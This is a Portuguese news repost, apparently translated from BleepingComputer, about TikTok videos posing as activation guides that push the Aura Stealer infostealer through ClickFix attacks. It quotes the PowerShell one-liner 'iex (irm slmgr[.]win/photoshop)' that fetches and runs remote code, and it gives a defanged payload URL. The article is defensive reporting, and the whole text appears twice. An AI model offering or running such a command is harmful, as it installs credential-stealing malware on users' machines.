🔥 Fique por dentro das novidades mais quentes do momento! 🔥
Não deixe essa passar: clique e saiba tudo!
Apoie esse projeto de divulgacao de noticias! Clique aqui
Os cibercriminosos estão usando vídeos do TikTok disfarçados de guias de ativação gratuitos para softwares populares como Windows, Spotify e Netflix para espalhar malware que rouba informações.
O manipulador do ISC, Xavier Mertens, detectou a campanha em andamento, que é basicamente a mesma observada pela Trend Micro em maio
Os vídeos do TikTok vistos pelo BleepingComputer pretendem oferecer instruções sobre como ativar produtos legítimos como Windows, Microsoft 365, Adobe Premiere, Photoshop, CapCut Pro e Discord Nitro, bem como serviços inventados como Netflix e Spotify Premium.
Vídeos maliciosos no TikTok empurrando infostealersFonte: BleepingComputer.com
Os vídeos estão realizando um ataque ClickFix, que é uma técnica de engenharia social que fornece o que parecem ser “correções” legítimas ou instruções que induzem os usuários a executar comandos maliciosos do PowerShell ou outros scripts que infectam seus computadores com malware.
Cada vídeo exibe um comando curto de uma linha e instrui os espectadores a executá-lo como administrador no PowerShell:
iex (irm slmgr[.]win/photoshop)
Deve-se observar que o nome do programa na URL é diferente dependendo do programa que está sendo representado. Por exemplo, nos vídeos falsos de ativação do Windows, em vez da URL contendo o photoshop, incluiria o windows.
Nesta campanha, quando o comando é executado, o PowerShell se conecta ao site remoto slmgr[.]win para recuperar e executar outro script do PowerShell.
Este script baixa dois executáveis das páginas da Cloudflare, com o primeiro executável baixado de https://file-epq[.]pages[.]dev/updater.exe [VirusTotal]. Este executável é uma variante do malware de roubo de informações Aura Stealer.
O Aura Stealer coleta credenciais salvas de navegadores, cookies de autenticação, carteiras de criptomoedas e credenciais de outros aplicativos e os carrega para os invasores, dando-lhes acesso às suas contas.
Mertens diz que uma carga adicional será baixada, chamada source.exe [VirusTotal], que é usada para autocompilar código usando o compilador Visual C# integrado do .NET (csc.exe). Este código é então injetado e lançado na memória.
O propósito da carga útil adicional permanece obscuro.
Os usuários que executam essas etapas devem considerar todas as suas credenciais comprometidas e redefinir imediatamente suas senhas em todos os sites que visitarem.
Os ataques ClickFix se tornaram muito populares no ano passado, usados para distribuir vários tipos de malware em campanhas de ransomware e roubo de criptomoedas.
Como regra geral, os usuários nunca devem copiar texto de um site e executá-lo em uma caixa de diálogo do sistema operacional, inclusive na barra de endereço do File Explorer, prompt de comando, prompts do PowerShell, terminal macOS e shells Linux.
O Picus Blue Report 2025 está aqui: aumento de 2X na quebra de senhas
46% dos ambientes tiveram senhas quebradas, quase o dobro dos 25% do ano passado.
Obtenha agora o Picus Blue Report 2025 para uma visão abrangente de mais descobertas sobre tendências de prevenção, detecção e exfiltração de dados.
Obtenha o Relatório Azul 2025
O manipulador do ISC, Xavier Mertens, detectou a campanha em andamento, que é basicamente a mesma observada pela Trend Micro em maio
Os vídeos do TikTok vistos pelo BleepingComputer pretendem oferecer instruções sobre como ativar produtos legítimos como Windows, Microsoft 365, Adobe Premiere, Photoshop, CapCut Pro e Discord Nitro, bem como serviços inventados como Netflix e Spotify Premium.
Vídeos maliciosos no TikTok empurrando infostealersFonte: BleepingComputer.com
Os vídeos estão realizando um ataque ClickFix, que é uma técnica de engenharia social que fornece o que parecem ser “correções” legítimas ou instruções que induzem os usuários a executar comandos maliciosos do PowerShell ou outros scripts que infectam seus computadores com malware.
Cada vídeo exibe um comando curto de uma linha e instrui os espectadores a executá-lo como administrador no PowerShell:
iex (irm slmgr[.]win/photoshop)
Deve-se observar que o nome do programa na URL é diferente dependendo do programa que está sendo representado. Por exemplo, nos vídeos falsos de ativação do Windows, em vez da URL contendo o photoshop, incluiria o windows.
Nesta campanha, quando o comando é executado, o PowerShell se conecta ao site remoto slmgr[.]win para recuperar e executar outro script do PowerShell.
Este script baixa dois executáveis das páginas da Cloudflare, com o primeiro executável baixado de https://file-epq[.]pages[.]dev/updater.exe [VirusTotal]. Este executável é uma variante do malware de roubo de informações Aura Stealer.
O Aura Stealer coleta credenciais salvas de navegadores, cookies de autenticação, carteiras de criptomoedas e credenciais de outros aplicativos e os carrega para os invasores, dando-lhes acesso às suas contas.
Mertens diz que uma carga adicional será baixada, chamada source.exe [VirusTotal], que é usada para autocompilar código usando o compilador Visual C# integrado do .NET (csc.exe). Este código é então injetado e lançado na memória.
O propósito da carga útil adicional permanece obscuro.
Os usuários que executam essas etapas devem considerar todas as suas credenciais comprometidas e redefinir imediatamente suas senhas em todos os sites que visitarem.
Os ataques ClickFix se tornaram muito populares no ano passado, usados para distribuir vários tipos de malware em campanhas de ransomware e roubo de criptomoedas.
Como regra geral, os usuários nunca devem copiar texto de um site e executá-lo em uma caixa de diálogo do sistema operacional, inclusive na barra de endereço do File Explorer, prompt de comando, prompts do PowerShell, terminal macOS e shells Linux.
O Picus Blue Report 2025 está aqui: aumento de 2X na quebra de senhas
46% dos ambientes tiveram senhas quebradas, quase o dobro dos 25% do ano passado.
Obtenha agora o Picus Blue Report 2025 para uma visão abrangente de mais descobertas sobre tendências de prevenção, detecção e exfiltração de dados.
Obtenha o Relatório Azul 2025
#samirnews #samir #news #boletimtec #os #vídeos #do #tiktok #continuam #a #empurrar #ladrões #de #informações #em #ataques #clickfix
🎉 Obrigado por acompanhar, até a próxima notícia!
Postar um comentário